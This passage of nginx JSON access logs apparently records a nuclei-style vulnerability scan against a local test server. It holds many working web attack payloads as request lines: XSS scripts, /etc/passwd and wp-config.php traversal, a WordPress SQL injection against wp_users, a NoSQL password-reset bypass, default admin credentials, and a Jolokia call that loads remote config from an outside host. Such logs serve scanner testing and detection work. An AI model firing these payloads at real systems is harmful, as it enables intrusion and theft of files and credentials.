(KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/prostore/go.php?https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00./.%00./etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"username=admin&password=gophish&csrf_token={{replace(url_encode(html_unescape(csrf_token)), \x22+\x22, \x22%2B\x22)}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Grimag/go.php?https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0a/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/login/LoginForm.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oam/server/opensso/sessionservice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/luci HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/shared/authn/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bower.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Orion/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /centreon/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/authentication_page.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf/People?OpenView HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0d/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"c\x02\x00H\x00\x04","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mifs/.;/services/LogService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"https://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get_device_details HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/assets/base/home.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /MUP/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"127.0.0.1/MUP", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMUser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /em/console/logon/logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%00/example.com/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apiclient/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"dir=%2Fetc%2F&onlyFiles=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/29N5mAHwsNG2J5jCQQmfXAysmsk/)%3B%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../conf/config.properties HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configure/app/landing/welcome-srm-va.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private-key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"{\x22code\x22: {\x22$gt\x22: 0}, \x22password\x22: \x22SuperStrongPassword1\x22, \x22passwordConfirmation\x22: \x22SuperStrongPassword1\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/auth/reset-password HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 